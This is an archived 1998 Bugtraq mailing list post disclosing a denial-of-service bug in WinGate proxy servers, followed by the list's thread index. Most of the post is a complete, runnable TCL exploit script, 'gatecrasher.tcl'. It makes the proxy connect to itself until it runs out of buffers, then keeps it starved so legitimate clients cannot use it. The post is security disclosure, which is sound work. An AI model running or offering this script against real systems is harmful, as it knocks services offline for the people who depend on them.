Bugtraq mailing list archives
WinGate DoS
From: carother () OU EDU (Matt Carothers)
Date: Sat, 21 Feb 1998 04:38:56 -0600
After a WinGate attack on our IRC channel, a friend of mine was toying around and discovered a fun bug: $ telnet unsecured.wingate.com Trying XXX.XX.XX.XXX... Connected to XXX.XX.XX.XXX. Escape character is '^]'. WinGate>localhost Connecting to host localhost...Connected As you can see, the WinGate happily connects to itself. Do this enough times, and ... WinGate>localhost Connecting to host localhost...Out of buffers At this point, the WinGate stops forwarding connections. Clients can still connect but cannot make use of it. Below is a simple TCL exploit to demonstrate the idea. - Matt #!/usr/local/bin/tclsh # gatecrasher.tcl # # This opens a WinGate and connects it to itself repeatedly until the # target machine runs out of buffers and stops forwarding connections. # The WinGate will not function as long as the script is running. # # Credit goes to Chris Snell <texan () hooked net> for finding the bug. # # I apologize in advance for not being cool enough to script this is perl. # # - Matt Carothers <carother () ou edu> set host [lindex $argv 0]; set port [lindex $argv 1]; if {![string compare $host ""]} { set command [string range $argv0 [expr [string last / $argv0] + 1] end]; puts stdout "Usage: $command <host> \[port\]"; exit 1; } if {![string compare $port ""]} { set port 23; } if {[catch {set sock [socket $host $port]} stuff]} { # Could not connect for some reason. Output an error message and exit. puts stdout "$host:$port : $stuff"; exit 1; } puts stdout "Connected to $host:$port. Launching WinGate kill ..."; set flag 0; puts $sock "localhost"; flush $sock; while {[gets $sock line] >= 0} { if {[string match "*Connected*" $line]} { # We've successfully connected the WinGate to itself. # Whee, let's do it again. puts $sock "localhost"; flush $sock; puts -nonewline stdout "."; flush stdout; set flag 0; } elseif {[string match "*Out of buffers*" $line]} { # The WinGate is now out of buffers. # We'll output a message to that effect and keep trying. This # serves as a keep-alive and lets us jump in and fill any buffers # freed by clients which disconnect after the attack succeeds. if {!$flag} { puts stdout "\n*plink*"; set flag 1; } puts $sock "localhost"; flush $sock; } } puts stdout "\nConnection lost.";
Current thread:
- Fw: tetex-0.4pl8 world-writable database Micha? Zalewski (Feb 20)
- Re: Fw: tetex-0.4pl8 world-writable database Marcin Cieslak (Feb 20)
- Pipe attack - an example Micha? Zalewski (Feb 20)
- cfs-1.4.0beta2 root exploitable bug ther (Feb 20)
- WinGate DoS Matt Carothers (Feb 21)
- Quick update on Radius bug Phillip R. Jaenke (Feb 21)
- Workaround for radius bug Phillip R. Jaenke (Feb 21)
- Re: cfs-1.4.0beta2 root exploitable bug ther (Feb 21)
- resource starvation against passwd(1) Antonomasia (Feb 22)
- RADIUS (Summary) Aleph One (Feb 22)
- Re: RADIUS (Summary) Dave Stewart (Feb 22)
- Re: RADIUS (Summary) Phillip R. Jaenke (Feb 22)
- Re: RADIUS (Summary) Josh Richards (Feb 22)